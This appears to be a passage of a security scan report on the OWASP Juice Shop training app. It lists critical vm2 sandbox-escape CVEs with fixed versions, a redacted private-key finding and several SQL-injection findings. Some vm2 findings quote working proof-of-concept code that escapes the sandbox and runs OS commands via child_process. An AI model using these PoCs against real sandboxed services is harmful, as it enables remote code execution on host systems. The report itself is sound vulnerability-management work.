+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

+ + +
Description
+

vm2 Access to Host Object Enables Sandbox Escape
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

It is possible to obtain the host Object, +https://github.com/patriksimek/vm2/commit/ +ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the + implementation is incomplete.

+

Details

+

There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom)

+

PoC

+
const g = {}.__lookupGetter__;
+const a = Buffer.apply;
+const p = a.apply(g, [Buffer, ['__proto__']]);
+const o = p.call(p.call(a));
+const HObject = o.constructor;
+sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
+
+const obj = {
+    [sym]: (depth, opt, inspect) => {
+        inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
+    },
+    valueOf: undefined,
+    constructor: undefined,
+};
+
+WebAssembly.compileStreaming(obj).catch(() => {});
+
+ +

Impact

+

Sandbox Escape -> RCE

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6

+ + + + + + + +
+
+
+
+ Finding 227: CVE-2026-26332 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

VM2 Has a Sandbox Escape Issue via SuppressedError
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

vm2 is an open source vm/sandbox for Node.js. Prior to version +3.11.0, SuppressedError allows attackers to escape the sandbox and run +arbitrary code. This issue has been patched in version 3.11.0.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0
+https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f
+https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca
+https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d
+https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95
+https://nvd.nist.gov/vuln/detail/CVE-2026-26332

+ + + + + + + +
+
+
+
+ Finding 226: CVE-2026-24781 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2: vm2: Arbitrary code execution via sandbox breakout through inspect function
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

vm2 is an open source vm/sandbox for Node.js. Prior to version +3.11.0, VM2 suffers from a sandbox breakout vulnerability through the +inspect function. This allows attackers to write code which can escape +from the VM2 sandbox and execute arbitrary commands on the host system. +This issue has been patched in version 3.11.0.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24781
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189
+https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c
+https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c
+https://nvd.nist.gov/vuln/detail/CVE-2026-24781
+https://www.cve.org/CVERecord?id=CVE-2026-24781

+ + + + + + + +
+
+
+
+ Finding 233: CVE-2026-44009 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2 has Sandbox Breakout Through Null Proto Exception
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.2

+

Summary

+

VM2 suffers from a sandbox breakout vulnerability. This allows +attackers to write code which can escape from the VM2 sandbox and +execute arbitrary commands on the host system.

+

Details

+

In handleException due to // SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`) + exceptions with a null proto will be assumed to come from the other +side and being proxied. Therefore, it is possible to get the proxied and + unproxied object of a sandbox object with a null proto when thrown and +then catched which allows to get the host Function object.

+

PoC

+
const {VM} = require("vm2");
+const vm = new VM();
+console.log(vm.run(`
+const o = {__proto__: null};
+try {
+    throw o;
+} catch (e) {
+    e.f = Buffer.prototype.inspect
+    o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
+}
+`));
+
+ +

Impact

+

Attackers can perform Remote Code Execution under the assumption that + arbitrary code can be executed inside the context of a vm2 sandbox.

+ + +
Mitigation
+

3.11.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm

+ + + + + + + +
+
+
+
+ Finding 225: CVE-2026-24120 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

VM2 Has Sandbox Breakout Through Promise Species
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.10.5

+

vm2 is an open source vm/sandbox for Node.js. Prior to version +3.10.5, the fix for CVE-2023-37466 is insufficient and can be +circumvented allowing attackers to write code which can escape from the +VM2 sandbox and execute arbitrary commands on the host system. This +issue has been patched in version 3.10.5.

+ + +
Mitigation
+

3.10.5

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.10.5
+https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
+https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p
+https://nvd.nist.gov/vuln/detail/CVE-2026-24120

+ + + + + + + +
+
+
+
+ Finding 224: CVE-2026-24118 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

VM2 Sandbox Breakout Through lookupGetter
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

vm2 is an open source vm/sandbox for Node.js. Prior to version +3.11.0, VM2 suffers from a sandbox breakout vulnerability. This allows +attackers to write code which can escape from the VM2 sandbox and +execute arbitrary commands on the host system. This issue has been +patched in version 3.11.0.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3
+https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p
+https://nvd.nist.gov/vuln/detail/CVE-2026-24118

+ + + + + + + +
+
+
+
+ Finding 223: CVE-2026-22709 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2 has a Sandbox Escape
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.10.2

+

vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, Promise.prototype.then Promise.prototype.catch + callback sanitization can be bypassed. This allows attackers to escape +the sandbox and run arbitrary code. In lib/setup-sandbox.js, the +callback function of localPromise.prototype.then is sanitized, but globalPromise.prototype.then is not sanitized. The return value of async functions is globalPromise object. Version 3.10.2 fixes the issue.

+ + +
Mitigation
+

3.10.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29
+https://github.com/patriksimek/vm2/releases/tag/v3.10.2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8
+https://nvd.nist.gov/vuln/detail/CVE-2026-22709

+ + + + + + + +
+
+
+
+ Finding 232: CVE-2026-44008 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2 has sandbox breakout via neutralizeArraySpeciesBatch
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.2

+

Summary

+

VM2 suffers from a sandbox breakout vulnerability. This allows +attackers to write code which can escape from the VM2 sandbox and +execute arbitrary commands on the host system.

+

Details

+

The new method neutralizeArraySpeciesBatch works with +objects from the other side but can call into this side via getter on +the array prototype exposing objects of the wrong side into the sandbox. + This can be used to get host objects and get the host Function object.

+

PoC

+
const {VM} = require("vm2");
+const vm = new VM();
+console.log(vm.run(`
+const a = [];
+Object.defineProperty(Array.prototype, 0, {
+    set(value) {
+        a.f = Buffer.prototype.inspect;
+        value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
+    }
+});
+new Buffer(a);
+`));
+
+ +

Impact

+

Attackers can perform Remote Code Execution under the assumption that + arbitrary code can be executed inside the context of a vm2 sandbox.

+ + +
Mitigation
+

3.11.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq

+ + + + + + + +
+
+
+
+ Finding 231: CVE-2026-44007 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

+ + +
Description
+

vm2 NodeVM nesting: true bypasses require: false allowing sandbox escape and arbitrary OS command execution
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.1

+

Summary

+

When a NodeVM is created with nesting: true, sandbox code can unconditionally require('vm2') regardless of the outer VM's require configuration — including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised.

+

Details

+

The vulnerability is in how the nesting: true option interacts with the legacy module resolver.

+

lib/nodevm.js:96-99NESTING_OVERRIDE is a special builtin map that injects the vm2 package into the sandbox:

+
const NESTING_OVERRIDE = Object.freeze({
+  __proto__: null,
+  vm2: vm2NestingLoader
+});
+
+ +

lib/nodevm.js:268-269 — When nesting: true, this override is passed into the resolver factory alongside the host's require options:

+
const customResolver = requireOpts instanceof Resolver;
+const resolver = customResolver ? requireOpts : makeResolverFromLegacyOptions(
+  requireOpts,
+  nesting && NESTING_OVERRIDE,  // ← injected when nesting:true
+  this._compiler
+);
+
+ +

lib/resolver-compat.js:193-197 — This is the vulnerable branch. When require: false is set, requireOpts is falsy, so !options is true. Without nesting the function returns DENY_RESOLVER (block everything). With nesting, it instead builds a resolver that includes vm2 from NESTING_OVERRIDE:

+
function makeResolverFromLegacyOptions(options, override, compiler) {
+  if (!options) {
+    if (!override) return DENY_RESOLVER;  // require:false, no nesting → deny all
+    // BUG: require:false + nesting:true reaches here
+    // override (NESTING_OVERRIDE) is applied, making vm2 available
+    const builtins = makeBuiltinsFromLegacyOptions(undefined, defaultRequire, undefined, override);
+    return new Resolver(DEFAULT_FS, [], builtins);  // vm2 is now requireable
+  }
+  // ...
+}
+
+ +

lib/builtin.js:102-106NESTING_OVERRIDE is merged unconditionally into builtins, overriding any user-configured allowlist:

+
if (overrides) {
+  const keys = Object.getOwnPropertyNames(overrides);
+  for (const key of keys) {
+    res.set(key, overrides[key]);  // vm2 always injected when nesting:true
+  }
+}
+
+ +

The result: require('vm2') always succeeds inside a NodeVM with nesting: true, regardless of require: false, require: { builtin: [] }, or any other restriction. Once the sandbox has vm2, it creates a new inner NodeVM with whatever require config it chooses — unconstrained by the outer VM — and reaches child_process.

+

This was introduced in commit 2353ce60 (Feb 8, 2022) and survived a major refactor in commit 9e2b6051 (Apr 8, 2023). The JSDoc for nesting does warn that "scripts can create a NodeVM which can require any host module," but does not document that nesting: true silently defeats require: false, which is the non-obvious part of this interaction.

+

PoC

+

Requirements: vm2 installed, Node.js v22.22.1 (also reproduced on earlier versions).

+
const { NodeVM } = require('vm2');
+
+// Host intends: nesting enabled, but require completely disabled
+const vm = new NodeVM({ nesting: true, require: false });
+
+const result = vm.run(`
+  // Step 1: require('vm2') succeeds despite require:false on the outer VM
+  const { NodeVM: NVM } = require('vm2');
+
+  // Step 2: create an inner NodeVM with attacker-chosen require config
+  // This inner VM has no relation to the outer VM's restrictions
+  const inner = new NVM({ require: { builtin: ['child_process'] } });
+
+  // Step 3: execute arbitrary OS command in the inner VM
+  module.exports = inner.run(
+    'module.exports = require("child_process").execSync("id").toString()'
+  );
+`);
+
+console.log(result);
+// uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),...
+
+ +

Observed output (confirmed on Node v22.22.1, vm2 commit 8dd0591):

+
uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),104(kvm),118(lpadmin),989(docker),990(ollama),991(nordvpn)
+
+ +

The variant with require: false also works — the outer VM's require setting has no effect:

+
new NodeVM({ nesting: true, require: false }).run(`
+  const { NodeVM: NVM } = require('vm2');
+  module.exports = new NVM({ require: { builtin: ['child_process'] } })
+    .run('module.exports = require("child_process").execSync("id").toString()');
+`);
+// uid=1000(akshat) ...
+
+ +

Narrow builtin allowlists are also bypassed. require: { builtin: ['path'] } still allows require('vm2') when nesting is enabled.

+

Impact

+

Who is affected: Any application that runs untrusted or user-supplied code inside a NodeVM with nesting: true. + This includes multi-tenant code execution platforms, notebook/REPL +services, plugin systems, and CI sandboxing tools that use vm2.

+

What an attacker can do: Execute arbitrary OS +commands as the host process user. From there: read/write files, +exfiltrate secrets from the environment, move laterally on the host +network, or establish persistence.

+

Severity: The mental model mismatch is the core danger. A developer who sets require: false to lock down modules, then adds nesting: true to allow child VM creation, will believe the sandbox is restricted. It is not — require: false is silently overridden and the sandbox has unrestricted OS access.

+

Note: nesting: true must be set by the host. This is not a zero-cooperation escape from a default NodeVM. However, it is not pure misconfiguration either: the implementation defeats a strong and reasonable expectation (require: false should mean deny all), and the existing warning in the docs does not surface the require: false bypass specifically.

+ + +
Mitigation
+

3.11.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.1
+https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx

+ + + + + + + +
+
+
+
+ Finding 222: CVE-2023-37903 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 78 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2: custom inspect function allows attackers to escape the sandbox and run arbitrary code
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up +to and including 3.9.19, Node.js custom inspect function allows +attackers to escape the sandbox and run arbitrary code. This may result +in Remote Code Execution, assuming the attacker has arbitrary code +execution primitive inside the context of vm2 sandbox. There are no +patches and no known workarounds. Users are advised to find an +alternative software.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-37903
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4
+https://nvd.nist.gov/vuln/detail/CVE-2023-37903
+https://security.netapp.com/advisory/ntap-20230831-0007
+https://security.netapp.com/advisory/ntap-20230831-0007/
+https://security.netapp.com/advisory/ntap-20241108-0002
+https://security.netapp.com/advisory/ntap-20241108-0002/
+https://www.cve.org/CVERecord?id=CVE-2023-37903

+ + + + + + + +
+
+
+
+ Finding 221: CVE-2023-37466 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2: Promise handler sanitization can be bypassed allowing attackers to escape the sandbox and run arbitrary code
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.10.0

+

vm2 is an advanced vm/sandbox for Node.js. The library contains +critical security issues and should not be used for production. The +maintenance of the project has been discontinued. In vm2 for versions up + to 3.9.19, Promise handler sanitization can be bypassed with the @@species + accessor property allowing attackers to escape the sandbox and run +arbitrary code, potentially allowing remote code execution inside the +context of vm2 sandbox. Version 3.10.0 contains a patch for the issue.

+ + +
Mitigation
+

3.10.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-37466
+https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/d9a1fde8ec5a5a9c9e5a69bf91d703950859d744
+https://github.com/patriksimek/vm2/releases/tag/v3.10.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
+https://nvd.nist.gov/vuln/detail/CVE-2023-37466
+https://security.netapp.com/advisory/ntap-20230831-0007
+https://security.netapp.com/advisory/ntap-20241108-0002
+https://security.netapp.com/advisory/ntap-20241108-0002/
+https://www.cve.org/CVERecord?id=CVE-2023-37466

+ + + + + + + +
+
+
+
+ Finding 220: CVE-2023-32314 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 74 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2: Sandbox Escape
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.9.18

+

vm2 is a sandbox that can run untrusted code with Node's built-in +modules. A sandbox escape vulnerability exists in vm2 for versions up to + and including 3.9.17. It abuses an unexpected creation of a host object + based on the specification of Proxy. As a result a threat +actor can bypass the sandbox protections to gain remote code execution +rights on the host running the sandbox. This vulnerability was patched +in the release of version 3.9.18 of vm2. Users are advised to upgrade. There are no known workarounds for this vulnerability.

+ + +
Mitigation
+

3.9.18

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-32314
+https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf
+https://github.com/patriksimek/vm2/releases/tag/3.9.18
+https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5
+https://nvd.nist.gov/vuln/detail/CVE-2023-32314
+https://www.cve.org/CVERecord?id=CVE-2023-32314

+ + + + + + + +

High

+ +
+
+
+
+ Finding 245: Secret Detected in /juice-shop/lib/insecurity.ts - Asymmetric Private Key + + + + secret + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
23
+ + + + + + + +
File Path
/juice-shop/lib/insecurity.ts
+
+
+
+ + + + + +
Description
+

Asymmetric Private Key
+Category: AsymmetricPrivateKey
+Match: ----BEGIN RSA PRIVATE KEY-----**********************************************************************************************************************-----END RSA PRIVATE

+ + + + + + + + + + + + + + + + + + +
+
+
+
+ Finding 2: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
5
+ + + + + + + +
File Path
/src/data/static/codefixes/dbSchemaChallenge_1.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 3: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
11
+ + + + + + + +
File Path
/src/data/static/codefixes/dbSchemaChallenge_3.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 4: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
6
+ + + + + + + +
File Path
/src/data/static/codefixes/unionSqlInjectionChallenge_1.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 5: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
10
+ + + + + + + +
File Path
/src/data/static/codefixes/unionSqlInjectionChallenge_3.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
